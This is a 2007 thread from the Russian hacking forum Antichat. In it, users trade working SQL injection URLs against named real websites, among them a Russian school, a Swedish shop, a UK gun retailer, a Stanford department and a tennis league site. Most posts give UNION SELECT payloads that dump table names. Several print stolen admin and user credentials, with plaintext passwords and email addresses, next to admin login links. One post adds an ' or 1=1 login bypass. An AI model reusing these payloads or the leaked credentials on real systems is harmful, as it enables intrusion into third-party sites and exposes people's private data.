Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.07.2007, 11:28
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
nvmu.ru
Подозрение на инъекцию:
http://nvmu.ru/cgi-bin/index.cgi?page=1'
Подбираем кол-во колонок:
http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/*
Version: MySQL 5.1.19-beta
User: nvmu@localhost
Database: nvmu
Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?
PS. Спасибо товарищу из аськи за наводку и заодно, что разбудил меня. =\
|
|
|
01.07.2007, 12:37
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/*
Хм.. Наверно там больше нет =\ Даже файлы прочитать не смог..
|
|
|
|
01.07.2007, 14:37
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
Код:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,3,4,5/*
эх найти бы таблицу юзеров
Последний раз редактировалось злюка; 01.07.2007 в 22:21..
|
|
|
|
01.07.2007, 15:03
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
http://english.stanford.edu/ - PR 7
http://english.stanford.edu/?news_id=-88+union+select+1,user(),3,4,database(),version(), 7,TABLE_NAME+from+information_schema.tables/*
Последний раз редактировалось Ky3bMu4; 01.07.2007 в 15:05..
|
|
|
|
01.07.2007, 20:01
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
2злюка
Код:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,3,4,5/
эх найти бы таблицу юзеров
tbl_user
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,count(1),4,5+from+tbl_user/*
95167 записей
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5+from+tbl_user+limit+0,1/*
admin:highstreet4013
админка
http://www.sportsguns.co.uk/login.php
-----------------------------------------------------------------
NOmeR1
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/*
Хм.. Наверно там больше нет =\ Даже файлы прочитать не смог..
вот-с
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,name,email,passw d),3,4,5,6,7,8,9,10,11,12,13,14+from+users+limit+0 ,1/*
ROBERT JONASSON:BMF_RIPPER@HOTMAIL.COM:4TWCPP
можно залогиниться тут - http://www.arcteryx.nu/butiken/login.php - но хз что с этим делать, я по голандски не умею, надо Хиддинка спросить)
------------------------------------------------------------------------
iv.
Подбираем кол-во колонок: Цитата:http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/* Version: MySQL 5.1.19-beta User: nvmu@localhost Database: nvmu Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?
можно нормально вывести здесь
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,table_name+from+informa tion_schema.tables+limit+35,1/*
есть табличка members
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,concat_ws(0x3a,login,pa ssword,email)+from+members+limit+0,1/*
Borisov:3788:s_nahim@inbox.ru
еще примечательно, что можно авторизироваться просто введя ' or 1=1/* вместо логина плюс произвольный пароль 
-----------------------------------------------------------------------
[PS] что-то везде пароли хранятся в открытом виде
Последний раз редактировалось Серенький; 01.07.2007 в 20:49..
|
|
|
|
02.07.2007, 15:07
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14
=\
|
|
|
|
02.07.2007, 15:19
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
http://www.worldteamtennis.com/
Офф сайт WTT(только чёт PR 4)
Код:
http://www.worldteamtennis.com/news/news_info.asp?news_id=-251+union+select+1,2,3,password,username,6,7,8,9+from+users
Одновременно username и password выводить не хочет. Надо по отдельности.
User: admin
Password: 2$$7#newsx
Админку не нашёл...
Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...
Код:
http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user
|
|
|
|
02.07.2007, 15:49
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
Spyder
Цитата:http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14
=\
никак не смог подобрать колонку с пассом..\
а табличка мемберс:
http://www.qb4q.com/vacation.php?wid=-14+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws(0 x3a,name,email),13,14+from+members/*
Последний раз редактировалось Серенький; 02.07.2007 в 16:01..
|
|
|
|
02.07.2007, 16:09
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от Ky3bMu4
Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...
Код:
http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user
Это MSSQL. Это не правильный вывод и там нет User.
|
|
|
|
02.07.2007, 17:50
|
|
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543
Репутация:
29
|
|
вношу свои =)
Код:
http://www.ji-association.org/news.phtml?id=-1+union+select+VERSION(),2,3,4,5,USER(),7,8,9,10+from+users/*
Код:
http://www.cosmopolitan.kz/content.php?idpart=3&idnum=-1+union+select+1,2,3,VERSION(),USER(),6,7,8/*
Код:
http://slt-tosol.ru/catalog.php?id=-1+union+select+1,VERSION(),USER(),4,5,6,7,8/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Линейный вид
